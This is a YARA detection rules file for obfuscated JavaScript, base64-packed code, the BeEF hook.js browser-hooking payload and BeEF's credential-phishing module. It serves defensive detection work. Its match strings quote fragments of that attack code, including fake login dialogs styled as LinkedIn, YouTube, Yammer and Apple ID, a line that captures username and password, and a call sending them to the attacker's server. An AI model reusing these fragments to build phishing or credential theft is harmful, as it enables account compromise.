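rule generic_javascript_obfuscation
{
	// Broad, low-fidelity indicators of packed/obfuscated JavaScript.  Any one of
	// the three patterns fires the rule, so expect hits on legitimate minified
	// bundles as well; treat as a triage signal, not a verdict.
	meta:
		author = "Josh Berry"
		date = "2016-06-26"
		description = "JavaScript Obfuscation Detection"
		sample_filetype = "js-html"
	strings:
		// eval() fed straight from a decoder: eval(unescape(...)), eval(atob(...)).
		// decodeURIComponent is the standard replacement for the deprecated
		// unescape() and is used the same way by packers.  Whitespace is allowed
		// before every "(" because beautifiers insert it.
		$string0 = /eval\s*\(\s*(unescape|atob|decodeURIComponent)\s*\(/ nocase
		// String table as an array of hex-escaped literals:  var _0x1a2b = ["\x41\x42...
		// Accepts let/const as well as var and single- as well as double-quoted
		// literals.  At least one whitespace character is now required after the
		// keyword so identifiers that merely start with "var" no longer match.
		// No "nocase": JS keywords and the \x escape are case-sensitive.
		$string1 = /(var|let|const)\s+[a-zA-Z_$][a-zA-Z0-9_$]*\s*=\s*\[\s*["']\\x[0-9a-fA-F]+/
		// Aliasing eval to hide it from grep-style review:  var e = eval;
		$string2 = /(var|let|const)\s+[a-zA-Z_$][a-zA-Z0-9_$]*\s*=\s*eval\s*;/
	condition:
		any of them
}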

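rule possible_includes_base64_packed_functions
{
	// Looks for a base64 decoder/encoder or data-URI marker together with a
	// base64 blob.  "impact" and "hide" are not standard YARA meta keys; they are
	// kept for whatever tooling consumes this file.
	meta:
		impact = 5
		hide = true
		desc = "Detects possible includes and packed functions"
	strings:
		// Decoder call or data-URI marker.  atob/btoa are ordinary browser APIs,
		// so this string alone is weak evidence; the blob below must match too.
		$f = /(atob|btoa|;base64|base64,)/ nocase
		// A base64 blob: at least 8 full quartets followed by one terminal group
		// (36+ characters).  The previous form allowed the leading group to repeat
		// zero times, so it matched any four alphanumerics and the condition
		// collapsed to "$f" alone.  '+' and '/' belong to the standard alphabet
		// and were missing.  8 is a noise threshold; tune for your corpus.
		// NOTE(review): a regex made only of character classes has no literal atom,
		// so YARA will likely flag it as slowing scans; anchoring it to a literal
		// such as "base64," would be faster but would miss bare atob("...") blobs.
		$fff = /([A-Za-z0-9+\/]{4}){8,}([A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{4})/
	condition:
		$f and $fff
}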
 
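rule BeEF_browser_hooked {
	// Detects the BeEF hook.js payload by its internal identifiers.  The former
	// $s17 ("mitb.sniff") was dropped: it is a prefix of $s9 ("mitb.sniff(") and
	// could never match independently, so it only inflated the string count.
	meta:
		description = "Yara rule related to hook.js, BeEF Browser hooking capability"
		author = "Pasquale Stirparo"
		date = "2015-10-07"
		hash1 = "587e611f49baf63097ad2421ad0299b7b8403169ec22456fb6286abf051228db"
	strings:
		// BeEF-specific identifiers: beef.*, mitb.* (man-in-the-browser module),
		// the "Be:EF" pushState marker and the XHR override message.
		$s0 = "mitb.poisonAnchor" wide ascii
		$s1 = "this.request(this.httpproto" wide ascii
		$s2 = "beef.logger.get_dom_identifier" wide ascii
		// Generic browser-fingerprinting snippets bundled into hook.js; weak on
		// their own, useful only as corroboration.
		$s3 = "return (!!window.opera" wide ascii
		$s4 = "history.pushState({ Be:\"EF\" }" wide ascii
		$s5 = "window.navigator.userAgent.match(/Opera\\/9\\.80.*Version\\/10\\./)" wide ascii
		$s6 = "window.navigator.userAgent.match(/Opera\\/9\\.80.*Version\\/11\\./)" wide ascii
		$s7 = "window.navigator.userAgent.match(/Avant TriCore/)" wide ascii
		$s8 = "window.navigator.userAgent.match(/Iceweasel" wide ascii
		$s9 = "mitb.sniff(" wide ascii
		$s10 = "Method XMLHttpRequest.open override" wide ascii
		$s11 = ".browser.hasWebSocket" wide ascii
		$s12 = ".mitb.poisonForm" wide ascii
		$s13 = "resolved=require.resolve(file,cwd||" wide ascii
		$s14 = "if (document.domain == domain.replace(/(\\r\\n|\\n|\\r)/gm" wide ascii
		$s15 = "beef.net.request" wide ascii
		$s16 = "uagent.search(engineOpera)" wide ascii
		$s18 = "beef.logger.start" wide ascii
	condition:
		// "all of them" pinned the rule to the exact hook.js build behind hash1;
		// one refactored snippet in a later BeEF release silently broke detection.
		// 12 of 17 tolerates routine drift while still forcing at least five of
		// the BeEF-specific strings to be present (only seven are generic).
		12 of them
}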

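rule src_ptheft_command {
	// Detects the BeEF "pretty theft" credential-phishing module (command.js),
	// which pops a fake "Session Timed Out" login dialog styled as LinkedIn,
	// YouTube, Yammer or Apple ID and posts the captured user:pass back to BeEF.
	// NOTE(review): $s7 contains ERB placeholders (<%= @command_url %>), so this
	// rule matches the module SOURCE on disk; in the rendered payload delivered to
	// a hooked browser those placeholders are substituted and $s7 will not match.
	// The duplicate of $s14 (former $s15, byte-identical) was removed because it
	// counted twice toward the threshold; the threshold is lowered from 13 to 12
	// so the effective bar is unchanged when that string is present.
	meta:
		description = "Auto-generated rule - file command.js"
		author = "Pasquale Stirparo"
		reference = "not set"
		date = "2015-10-08"
		hash = "49c0e5400068924ff87729d9e1fece19acbfbd628d085f8df47b21519051b7f3"
	strings:
		// Branding assets of the phishing templates.
		$s0 = "var lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';" fullword wide ascii /* score: '38.00' */
		$s1 = "dark=document.getElementById('darkenScreenObject'); " fullword wide ascii /* score: '21.00' */
		$s2 = "beef.execute(function() {" fullword wide ascii /* score: '21.00' */
		$s3 = "var logo  = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';" fullword wide ascii /* score: '32.42' */
		$s4 = "description.text('Enter your Apple ID e-mail address and password');" fullword wide ascii /* score: '28.00' */
		// Dialog markup; truncated by the generator, hence no "fullword".
		$s5 = "sneakydiv.innerHTML= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +ti" wide ascii /* score: '28.00' */
		$s6 = "var logo  = 'https://www.yammer.com/favicon.ico';" fullword wide ascii /* score: '27.42' */
		// Exfiltration call back to the BeEF server (ERB template form).
		$s7 = "beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);" fullword wide ascii /* score: '26.00' */
		$s8 = "var title = 'Session Timed Out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"LinkedIn\">';" fullword wide ascii /* score: '24.00' */
		$s9 = "var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"YouTube\">';" fullword wide ascii /* score: '24.00' */
		$s10 = "var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"Yammer\">';" fullword wide ascii /* score: '24.00' */
		$s11 = "var logobox = 'style=\"border:4px #84ACDD solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';" fullword wide ascii /* score: '21.00' */
		$s12 = "sneakydiv.innerHTML= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>Your session has timed out!</h2><p>For" wide ascii /* score: '23.00' */
		$s13 = "inner.append(title, description, user,password);" fullword wide ascii /* score: '23.00' */
		$s14 = "sneakydiv.innerHTML= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_bar" wide ascii /* score: '23.00' */
		// Credential capture: "uname:pass" assembled before being sent via $s7.
		$s16 = "answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;" fullword wide ascii /* score: '22.00' */
		$s17 = "password.keydown(function(event) {" fullword wide ascii /* score: '21.01' */
	condition:
		12 of them
}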